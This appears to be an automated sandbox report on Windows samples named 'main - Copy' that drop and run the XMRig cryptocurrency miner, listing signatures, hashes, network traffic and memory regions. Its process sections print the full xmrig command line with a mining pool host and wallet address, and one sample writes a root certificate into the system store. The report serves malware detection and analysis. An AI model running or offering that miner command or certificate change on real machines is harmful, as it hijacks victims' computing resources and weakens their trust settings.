| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2232 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3768,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4716,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=3760 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.28.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1180-16-0x000001E328A20000-0x000001E328A40000-memory.dmp
memory/1180-17-0x000001E328A50000-0x000001E328A70000-memory.dmp
memory/1180-18-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-19-0x000001E328A70000-0x000001E328A90000-memory.dmp
memory/1180-20-0x000001E328A90000-0x000001E328AB0000-memory.dmp
memory/1180-21-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-22-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-23-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-24-0x000001E328A70000-0x000001E328A90000-memory.dmp
memory/1180-25-0x000001E328A90000-0x000001E328AB0000-memory.dmp
memory/1180-26-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-27-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-28-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-29-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-30-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-31-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-32-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-33-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-34-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-35-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-36-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-37-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-38-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-39-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-40-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-41-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-42-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-43-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-44-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-45-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-46-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-47-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-48-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-49-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-50-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-51-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-52-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-53-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-54-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-55-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-56-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-57-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-58-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-59-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-60-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-61-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-62-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-63-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-64-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-65-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-66-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-67-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-68-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-69-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-70-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-71-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-72-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-73-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-74-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-75-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-76-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-77-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-78-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-79-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-80-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-81-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-82-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-83-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-84-0x00007FF722840000-0x00007FF723343000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:42
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4080 wrote to memory of 1620 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4080 wrote to memory of 1620 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1276 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1388,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1620-16-0x0000013B31940000-0x0000013B31960000-memory.dmp
memory/1620-17-0x0000013B31B90000-0x0000013B31BB0000-memory.dmp
memory/1620-18-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-19-0x0000013B31BB0000-0x0000013B31BD0000-memory.dmp
memory/1620-20-0x0000013B31BE0000-0x0000013B31C00000-memory.dmp
memory/1620-21-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-22-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-25-0x0000013B31BE0000-0x0000013B31C00000-memory.dmp
memory/1620-24-0x0000013B31BB0000-0x0000013B31BD0000-memory.dmp
memory/1620-23-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-26-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-27-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-28-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-29-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-30-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-31-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-32-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-33-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-34-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-35-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-36-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-37-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-38-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-39-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-40-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-41-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-42-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-43-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-44-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-45-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-46-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-47-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-48-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-49-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-50-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-51-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-52-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-53-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-54-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-55-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-56-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-57-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-58-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-59-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-60-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-61-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-62-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-63-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-64-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-65-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-66-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-67-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-68-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-69-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-70-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-71-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-72-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-73-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-74-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-75-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-76-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-77-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-78-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-79-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-80-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-81-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-82-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-83-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-84-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
